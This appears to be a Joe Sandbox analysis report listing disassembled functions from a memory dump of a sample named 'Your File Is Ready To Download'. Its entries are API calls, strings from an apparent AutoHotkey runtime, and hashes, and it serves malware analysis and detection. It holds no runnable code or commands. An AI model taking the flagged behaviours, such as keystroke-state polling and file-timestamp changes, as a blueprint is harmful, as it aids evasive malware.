
Function 000000014003F130, Relevance: 4.7, APIs: 1, Strings: 2, Instructions: 212COMMON

Download Yara Rule

Strings

Out of memory., xrefs: 000000014003F439
Memory limit reached (see #MaxMem in the help file)., xrefs: 000000014003F1FD

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID:
String ID: Memory limit reached (see #MaxMem in the help file).$Out of memory.
API String ID: 0-457448710
Opcode ID: e86c449c25c962ef3092796b55c7613746b844d1373ac1738abe51217b179473
Instruction ID: 149ee7bbda4bfc384a120be5e5a92ad48e1d8d73a32f8cf3b6fc17d9072b26b1
Opcode Fuzzy Hash: e86c449c25c962ef3092796b55c7613746b844d1373ac1738abe51217b179473
Instruction Fuzzy Hash: BE91C172604B5081EB639B23D4043FAA3A2A75CBD4F548612FB5E177E9DB78C986E340

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140081030, Relevance: 4.5, APIs: 3, Instructions: 34fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32 ref: 000000014008105E
FindFirstFileW.KERNEL32 ref: 000000014008107B
FindClose.KERNEL32 ref: 0000000140081095

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: dde0e23184eb4b85c4be0181b70095edbfd68f0bf2424e3006dabb8d17953312
Instruction ID: e08a98fb4ad7be18a68edb38f80a90e589970f7bfcef9dd52f8e55afdeb460c5
Opcode Fuzzy Hash: dde0e23184eb4b85c4be0181b70095edbfd68f0bf2424e3006dabb8d17953312
Instruction Fuzzy Hash: 8CF0547260534082FE665722B8493E813556F9A7B0F485734AA3D0B3F2EA7C85DA8910

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140087091, Relevance: 3.4, APIs: 1, Strings: 1, Instructions: 356COMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 0000000140087343

Strings

Out of memory., xrefs: 0000000140087842

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: malloc
String ID: Out of memory.
API String ID: 2803490479-4087320997
Opcode ID: 5e6afb7feea786a948b09a91cbeac3c10310c863ef857a52c4694ffbac665a42
Instruction ID: 4ab0eb29b4b799dac9d2a91a93844e5d5b2b3669cfd1aa6033798cdf9e6b48a8
Opcode Fuzzy Hash: 5e6afb7feea786a948b09a91cbeac3c10310c863ef857a52c4694ffbac665a42
Instruction Fuzzy Hash: 14F19A33200A8486EB66DF2BC554BE937A2F748BD8F455225EB1D17BE9DB34CA85C340

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400B70E0, Relevance: .4, Instructions: 443COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91392591191e8db755cead2135f79257377545bccbd1ac7aaf119afed8fe4863
Instruction ID: 6a7815e002ad95f1f8fef32278e0b9c999a7f63437a6ba05c8b9b827fb4183e1
Opcode Fuzzy Hash: 91392591191e8db755cead2135f79257377545bccbd1ac7aaf119afed8fe4863
Instruction Fuzzy Hash: 0B126A32B00B908AE765CFAAD441BED37B5F718798F25412AEF4857BA8DB74C941CB40

Uniqueness

Uniqueness Score: -1.00%

Function 000000014000A120, Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85789c11792fc48d90b6161d011240e4be3dc5371aebc8dd8522116747c55a3f
Instruction ID: 0babe6e92625587c5192057caf85738a4f3410fa05e20bfbe56e9baf939b5391
Opcode Fuzzy Hash: 85789c11792fc48d90b6161d011240e4be3dc5371aebc8dd8522116747c55a3f
Instruction Fuzzy Hash: C14104A79149A04BFB068623A4E23F577E1D365BA3F894412B7C4436C6D12DC68FEB20

Uniqueness

Uniqueness Score: -1.00%

Function 000000014009A010, Relevance: 33.5, APIs: 17, Strings: 2, Instructions: 235COMMON

Download Yara Rule

APIs

GetStockObject.GDI32 ref: 000000014009A080
GetDC.USER32 ref: 000000014009A0A5
SelectObject.GDI32 ref: 000000014009A0CE
GetTextFaceW.GDI32 ref: 000000014009A0F4
GetTextMetricsW.GDI32 ref: 000000014009A101
GetDeviceCaps.GDI32 ref: 000000014009A124
MulDiv.KERNEL32 ref: 000000014009A138
SelectObject.GDI32 ref: 000000014009A17F
ReleaseDC.USER32 ref: 000000014009A18A
wcsncpy.LIBCMT ref: 000000014009A1F3

Strings

Too many fonts., xrefs: 000000014009A512
Can't create font., xrefs: 000000014009A5AB

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: Object$SelectText$CapsDeviceFaceMetricsReleaseStockwcsncpy
String ID: Can't create font.$Too many fonts.
API String ID: 113413196-123602064
Opcode ID: eaa87ff1d84e881ab6b6e1637c96aa2fdf24c204536da0ca5328fe421d0de6c5
Instruction ID: edb802fea85ac3b9ef79c25bebb9df598249f1c3e9a66c48a413bfad6f998ec7
Opcode Fuzzy Hash: eaa87ff1d84e881ab6b6e1637c96aa2fdf24c204536da0ca5328fe421d0de6c5
Instruction Fuzzy Hash: 06B1BC727006818AEB2A9F36E8507E977A1F789B98F008116EF5A076F9DB3CC546C740

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400AE090, Relevance: 22.7, APIs: 15, Instructions: 159windowCOMMON

Download Yara Rule

APIs

GetIconInfo.USER32 ref: 00000001400AE0BC
GetObjectW.GDI32 ref: 00000001400AE0DF
CreateCompatibleDC.GDI32 ref: 00000001400AE0F6
CreateDIBSection.GDI32 ref: 00000001400AE152
SelectObject.GDI32 ref: 00000001400AE16A
DrawIconEx.USER32 ref: 00000001400AE1A2
GdiFlush.GDI32(?,?,?,?,?,?,?,?,?,00000000,?,?,0000000140076CFE), ref: 00000001400AE1A8
GetDIBits.GDI32 ref: 00000001400AE237

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CreateIconObject$BitsCompatibleDrawFlushInfoSectionSelect
String ID:
API String ID: 1804173336-0
Opcode ID: 7aee31ec92bde63d3ea82f51c7486baecdb1a0c94470f2e2e00459c2e0d10d33
Instruction ID: 7a6eaf64d1ea9cfd6b4c9b2e1a319b44077451b2f87e9aba24267bb56aafb39b
Opcode Fuzzy Hash: 7aee31ec92bde63d3ea82f51c7486baecdb1a0c94470f2e2e00459c2e0d10d33
Instruction Fuzzy Hash: F86182362117808AFB229F26D8447ED37A4FB5CBD9F444A25FB1A43BA4DB38C546CB10

Uniqueness

Uniqueness Score: -1.00%

Function 000000014008D105, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 240COMMON

Download Yara Rule

APIs

GetWindowRect.USER32 ref: 000000014008D10D
ScreenToClient.USER32 ref: 000000014008D12C
MulDiv.KERNEL32 ref: 000000014008D20D
MulDiv.KERNEL32 ref: 000000014008D2D0
MulDiv.KERNEL32 ref: 000000014008D399
MulDiv.KERNEL32 ref: 000000014008D45A

Strings

%sX, xrefs: 000000014008D163
%sY, xrefs: 000000014008D22B
%sW, xrefs: 000000014008D2EE
%sH, xrefs: 000000014008D3B1

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: ClientRectScreenWindow
String ID: %sH$%sW$%sX$%sY
API String ID: 3371951266-2562685033
Opcode ID: bc82f905009b77a62bb31107895c40c7e390511d45abf6b6e99bd73b49d6bcec
Instruction ID: 9253a86bf2e2f7b2fa3bc5bc0c425d991e222e72b6d8bd8635e38316f02d8bf7
Opcode Fuzzy Hash: bc82f905009b77a62bb31107895c40c7e390511d45abf6b6e99bd73b49d6bcec
Instruction Fuzzy Hash: 5DB1B372205A9496EB129B22E4403DE7771F78CBC8F544216EF4957BA9DB38CA46CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400920BA, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32 ref: 0000000140092108
DestroyWindow.USER32 ref: 0000000140092145
SetPropW.USER32 ref: 000000014009216E
SetWindowLongPtrW.USER32 ref: 000000014009219F

Part of subcall function 000000014009D770: CreateDialogIndirectParamW.USER32 ref: 000000014009D7C4
Part of subcall function 000000014009D770: SetPropW.USER32 ref: 000000014009D7DF
Part of subcall function 000000014009D770: DestroyWindow.USER32 ref: 000000014009D7EC

SelectObject.GDI32 ref: 000000014009235C
ReleaseDC.USER32 ref: 000000014009236D

Strings

ahk_autosize, xrefs: 0000000140092164
SysTabControl32, xrefs: 00000001400920FD
Can't create control., xrefs: 0000000140092380

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: Window$CreateDestroyProp$DialogIndirectLongObjectParamReleaseSelect
String ID: Can't create control.$SysTabControl32$ahk_autosize
API String ID: 29589847-4181254606
Opcode ID: 74cc7cad9a738b0361d60ecb49be3d7f814d15f21886881410eacf04b87b4641
Instruction ID: 1364cb5db60d1f60d85a50140ff98cd2741dc2b13429e4b8d27b588a5c2a2b57
Opcode Fuzzy Hash: 74cc7cad9a738b0361d60ecb49be3d7f814d15f21886881410eacf04b87b4641
Instruction Fuzzy Hash: E9410276205B8089EB52CF26E8407DD77A1FB4CBD8F448126EB89877B8DB38CA55C710

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140065FF0, Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 239COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32 ref: 0000000140066022
GetLastError.KERNEL32 ref: 000000014006602F

Strings

Out of memory., xrefs: 0000000140066370
Memory limit reached (see #MaxMem in the help file)., xrefs: 0000000140066129
, xrefs: 00000001400661F5

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: AttributesErrorFileLast
String ID: $Memory limit reached (see #MaxMem in the help file).$Out of memory.
API String ID: 1799206407-1193006554
Opcode ID: 3b0f9a30385456ffea777a7922df2156320e05e1b533d5d03ce35d0fca5d937f
Instruction ID: d041bf3108b29fd9304b420ba69acdcfbdfe623088ca005a06f2f89967b6b636
Opcode Fuzzy Hash: 3b0f9a30385456ffea777a7922df2156320e05e1b533d5d03ce35d0fca5d937f
Instruction Fuzzy Hash: 35A1E532204B9185FB639B32EC143EA6352A79DBD4F684A11EF1E4B7E5DB78C545C340

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140092008, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 78windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32 ref: 0000000140092056
SendMessageW.USER32 ref: 00000001400920AC
SelectObject.GDI32 ref: 000000014009235C
ReleaseDC.USER32 ref: 000000014009236D

Part of subcall function 000000014009CA10: SendMessageW.USER32 ref: 000000014009CAA0
Part of subcall function 000000014009CA10: SendMessageW.USER32 ref: 000000014009CABE
Part of subcall function 000000014009CA10: SendMessageW.USER32 ref: 000000014009CB08

Strings

msctls_progress32, xrefs: 000000014009204B
Can't create control., xrefs: 0000000140092380

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: MessageSend$CreateObjectReleaseSelectWindow
String ID: Can't create control.$msctls_progress32
API String ID: 3196501506-3641780397
Opcode ID: e54280de3c0299e973b6deb5d1520ab1b1f8caa96f18f3775e4cabc5cf6be609
Instruction ID: 1a151c4c545600617cd5c0c717128ee3613ae3cfbde3217d56f83d3d183570e8
Opcode Fuzzy Hash: e54280de3c0299e973b6deb5d1520ab1b1f8caa96f18f3775e4cabc5cf6be609
Instruction Fuzzy Hash: 8931F676305A8089EB52CB66E8407DD63A1F74CBD8F549025EF4957BB8DB38C985C700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400D2048, Relevance: 10.6, APIs: 7, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

__doserrno.LIBCMT ref: 00000001400D2061
_errno.LIBCMT ref: 00000001400D2069
_close_nolock.LIBCMT ref: 00000001400D20C0

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: __doserrno_close_nolock_errno
String ID:
API String ID: 186997739-0
Opcode ID: bb16f57f56811ea002edbd08b35f8f9acba78d02a911a08bd865d1ae7e7ae3c0
Instruction ID: 286b99a2c20da3a1b26cc9f8c746837a5edaaf3fec2c9efb139c8532c88af651
Opcode Fuzzy Hash: bb16f57f56811ea002edbd08b35f8f9acba78d02a911a08bd865d1ae7e7ae3c0
Instruction Fuzzy Hash: 7D11B67260464455F21B6F67A8453ED3A50AFAC7E4F5A4626B72A073F3C7B88482D324

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140017FF0, Relevance: 9.2, APIs: 6, Instructions: 230threadwindowCOMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 00000001400180E7
GetSystemMetrics.USER32 ref: 0000000140018132
GetCursorPos.USER32(?,?,?,?,?,?,?,?,?,?,00000001400165FF), ref: 00000001400181AF
WindowFromPoint.USER32(?,?,?,?,?,?,?,?,?,?,00000001400165FF), ref: 00000001400181BA
GetWindowThreadProcessId.USER32 ref: 00000001400181E4
SendMessageW.USER32(?,?,?,?,?,?,?,?,?,?,00000001400165FF), ref: 0000000140018215

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: MetricsSystemWindow$CursorFromMessagePointProcessSendThread
String ID:
API String ID: 4190604185-0
Opcode ID: 001d2751f2c0ea23dba788a95f0842c70af3d7cc0185038278cbc76d6c2aa86e
Instruction ID: f68d589ceef57119e54cbea6f95dd4c548601844e37f4ebe32dae1eded86cfa3
Opcode Fuzzy Hash: 001d2751f2c0ea23dba788a95f0842c70af3d7cc0185038278cbc76d6c2aa86e
Instruction Fuzzy Hash: 8391C031614A8486FBB79B17A4407E977A1B79DBC0F484105FF861FAF4DB7ACA858B00

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400480BD, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 106COMMON

Download Yara Rule

Strings

sc%03X, xrefs: 000000014004821D
EndKey:, xrefs: 00000001400480F6
EndKey, xrefs: 00000001400480CD, 0000000140048258

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID:
String ID: EndKey$EndKey:$sc%03X
API String ID: 0-2517657595
Opcode ID: 39c4e2e22996cb116458ec8c947a5597aa053a58d494e28869eb96fd358e2ddc
Instruction ID: 1669263bb4439b1d73c09b5e351fe04a41c149b66bbc0d45e08e094a132f21bf
Opcode Fuzzy Hash: 39c4e2e22996cb116458ec8c947a5597aa053a58d494e28869eb96fd358e2ddc
Instruction Fuzzy Hash: 2041B17A60479084EB769F22A5403EFABA4F74D7C8F444426FF8803AB9DB79C486C304

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400060B0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 50memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(?,?,?,0000000140006055), ref: 00000001400060D8
GlobalLock.KERNEL32 ref: 0000000140006111
GlobalFree.KERNEL32 ref: 0000000140006124

Strings

GlobalAlloc, xrefs: 00000001400060EE
GlobalLock, xrefs: 0000000140006131

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: Global$AllocFreeLock
String ID: GlobalAlloc$GlobalLock
API String ID: 1811133220-3672399903
Opcode ID: a4f84c14dbdc6ce199a6a28741ac3d95d06f8992587bbe360abfb62017ea737f
Instruction ID: aafdd01c5fb274af8b0df55ea84b20a7f0fca004a30534e934bffe71acb77ac4
Opcode Fuzzy Hash: a4f84c14dbdc6ce199a6a28741ac3d95d06f8992587bbe360abfb62017ea737f
Instruction Fuzzy Hash: 05114F71200B4181EF4ADF26F4913D963A0EB5CBC8F589026EB0D473B9EE38C995C340

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400190E0, Relevance: 7.6, APIs: 5, Instructions: 81keyboardthreadCOMMON

Download Yara Rule

APIs

GetKeyState.USER32 ref: 00000001400190FD
GetKeyState.USER32 ref: 0000000140019124
GetForegroundWindow.USER32 ref: 0000000140019174
GetWindowThreadProcessId.USER32 ref: 000000014001917F
GetKeyState.USER32 ref: 00000001400191C3

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: State$Window$ForegroundProcessThread
String ID:
API String ID: 2921243749-0
Opcode ID: 6a64c37a2b1d70977339c9663a3d8ecc06e0a23c3fd23c235067eab5c63bd4dc
Instruction ID: 91e3832c4513c6cfed92585211f6386d2bf043fe89ee51a33a13ce67df379b64
Opcode Fuzzy Hash: 6a64c37a2b1d70977339c9663a3d8ecc06e0a23c3fd23c235067eab5c63bd4dc
Instruction Fuzzy Hash: 4E31F03260469086F3769B2AB4427DE77A1E78DBD4F180108FB950BAF6DB3AD445CB10

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140067040, Relevance: 7.6, APIs: 5, Instructions: 62filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 0000000140067072
GetLastError.KERNEL32 ref: 0000000140067081
SetFileTime.KERNEL32 ref: 00000001400670EA
GetLastError.KERNEL32 ref: 00000001400670F6
CloseHandle.KERNEL32 ref: 0000000140067109

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: ErrorFileLast$CloseCreateHandleTime
String ID:
API String ID: 1269242970-0
